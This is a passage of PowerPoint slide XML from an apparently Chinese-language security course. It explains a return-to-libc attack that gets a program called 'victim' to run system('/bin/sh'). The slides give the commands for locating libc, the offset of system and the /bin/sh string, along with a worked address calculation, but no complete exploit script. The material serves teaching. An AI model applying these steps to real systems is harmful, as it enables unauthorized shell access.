        <p:spPr>
          <a:xfrm>
            <a:off x="2080260" y="2795905"/>
            <a:ext cx="5847080" cy="838835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414450" y="2343150"/>
            <a:ext cx="6191250" cy="2171700"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251751" y="1515509"/>
            <a:ext cx="4844249" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>测试：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251751" y="5019325"/>
            <a:ext cx="4844249" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>66</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，是预先设置的返回值。验证成功</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1438275"/>
            <a:ext cx="10328275" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序在执行的过程中，会和系统产生交互，调用到库函数。我们可以利用这一点，让程序执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>system(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	system()会调用fork()产生子进程，由子进程来调用/bin/sh-c string来执行参数string字符串所代表的命令，此命令执行完后随即返回原调用的进程。在调用system()期间SIGCHLD 信号会被暂时搁置，SIGINT和SIGQUIT 信号则会被忽略。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>问题的关键是寻找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的地址。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数，存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>动态链接库。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查阅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的地址入口。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的偏移，从而得出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的地址。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（程序和系统里，都可能存在）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2032635" y="2498725"/>
            <a:ext cx="6358255" cy="984885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2032635" y="4370705"/>
            <a:ext cx="6899910" cy="1421765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="930275"/>
            <a:ext cx="9688195" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ldd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LD_TRACE_LOADED_OBJECTS=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>该环境变量设置为1的话，会打印所执行的程序的依赖，即所依赖的动态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="3540760"/>
            <a:ext cx="9339580" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数相对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的偏移</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> -s /lib/i386-linux-gnu/libc.so.6 | grep system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="5890260"/>
            <a:ext cx="8594725" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0xf7df1000+0x0003ab30=0xf7e2bb30</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238885" y="3078480"/>
            <a:ext cx="7054850" cy="1466850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238885" y="1357630"/>
            <a:ext cx="9037320" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   在程序里找：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$ rafind2 -z -s /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ./victim    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>没有找到</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在libc里找：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$ rafind2 -z -s /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> /lib/i386-linux-gnu/libc.so.6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="4853940"/>
            <a:ext cx="8725535" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
